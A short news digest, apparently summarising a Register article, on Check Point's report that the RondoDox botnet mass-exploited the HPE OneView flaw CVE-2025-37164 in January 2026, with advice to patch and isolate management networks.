RondoDox botnet linked to large-scale exploit of critical HPE OneView bug

Steven

RondoDox botnet linked to large-scale exploit of critical HPE OneView bug

Summary

Check Point has observed mass exploitation of CVE-2025-37164, a maximum-severity remote code execution flaw in HPE OneView. Between 05:45 and 09:20 UTC on 7 January 2026, telemetry recorded more than 40,000 automated attack attempts targeting the bug. The activity is attributed to the RondoDox Linux-based botnet, which uses a wide-ranging ‘exploit-shotgun’ method to compromise devices and deliver secondary payloads.

The vulnerability affects OneView, HPE’s central data-centre management platform that controls servers, storage and networking — making it a high-value target. Check Point linked the attacks to RondoDox via a distinctive user-agent and observed commands used to fetch RondoDox malware. The attacks were global and focused largely on government organisations, financial services and industrial manufacturers.

Key Points

  • Over 40,000 automated exploitation attempts of CVE-2025-37164 were observed in a four-hour window on 7 January 2026.
  • CVE-2025-37164 is a maximum-severity remote code execution flaw in HPE OneView, a centralised management platform.
  • Check Point attributes the campaign to the RondoDox botnet based on user-agent strings and commands used to download malware.
  • Attacks were global, with the highest volumes seen in the United States, then Australia, France, Germany and Austria.
  • Primary targets included government organisations, financial services and industrial manufacturers.
  • The incident underscores the danger of slow patch cycles for management platforms — HPE urged users to apply the patch promptly.

Context and relevance

Management platforms like OneView sit at the heart of datacentre operations; a successful RCE there can give attackers broad, high-privilege control. The RondoDox activity fits a wider trend of automated, opportunistic mass exploitation where adversaries scan and weaponise public fixes rapidly. For IT, security and ops teams this is a reminder to prioritise patching, monitor for indicators such as unusual user-agents and suspicious download commands, and restrict access to management interfaces.

Author’s take

Punchy: This isn’t theoretical — it’s active, automated and noisy. If you manage HPE OneView or run systems that depend on it, treat this as high priority: patch, isolate management networks and hunt for compromise indicators now.

Why should I read this?

Quick and blunt: if you care about keeping your servers and network under your control, this matters. The article shows attackers are already exploiting the OneView bug at scale — we’ve saved you time by flagging what to patch and where to look for signs of compromise.

Source

Source: https://go.theregister.com/feed/www.theregister.com/2026/01/16/rondodox_botnet_hpe_oneview/